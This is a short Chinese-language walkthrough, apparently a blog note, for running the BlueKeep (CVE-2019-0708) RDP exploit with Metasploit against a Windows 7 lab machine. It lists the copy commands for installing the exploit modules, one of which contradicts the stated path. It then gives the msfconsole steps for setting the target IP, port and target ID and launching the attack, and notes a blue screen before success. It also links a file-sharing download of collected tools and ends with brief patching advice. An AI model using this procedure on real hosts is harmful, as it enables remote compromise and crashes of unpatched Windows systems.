下载后将文件移到kali并将它门放到指定位置
rdp.rb放到/usr/share/metasploit-framework/lib/msf/core/exploit 目录
rdp_scanner.rb和cve_2019_0708_bluekeep.rb放到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 目录
cve_2019_0708_bluekeep_rce.r放进/usr/share/metasploit-framework/modules/exploits/windows/rdp 目录,这里需要注意如果没有rdp这个目录就去创建个。
命令(一定要把原先的文件覆盖)
cp rdp.rb /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
3、更新msf的模块
先在kali中msfconsole进入metasploit
在使用reload_all加载复制过去的脚本
稍等一下即可
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 使用模块
这个exp 目前只有 windwos 7 /2008r2 (我这里用的是win7旗舰版64位)
set RHOSTS 设置IP
set RPORT 设置RDP端口号
使用set target ID设置受害机机器
使用exploit开始攻击,等待建立连接
于是
set RHOSTS 192.168.10.55填写受害机
set RPORT 3389设置端口(固定)
show targets
以为我是虚拟机win7所以这里选三
set target 3
然后就exploit或run开始攻击(第一次win7蓝屏,第二次成功)
搜集的漏洞检测工具
网盘链接https://pan.baidu.com/s/1ylewLDQPwc4FuxCkm-aQlg 提取码ailu
漏洞修复:
- 及时打对应系统的安全补丁
- 关闭3389端口或添加防火墙安全策略限制对3389端口的访问
- 打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击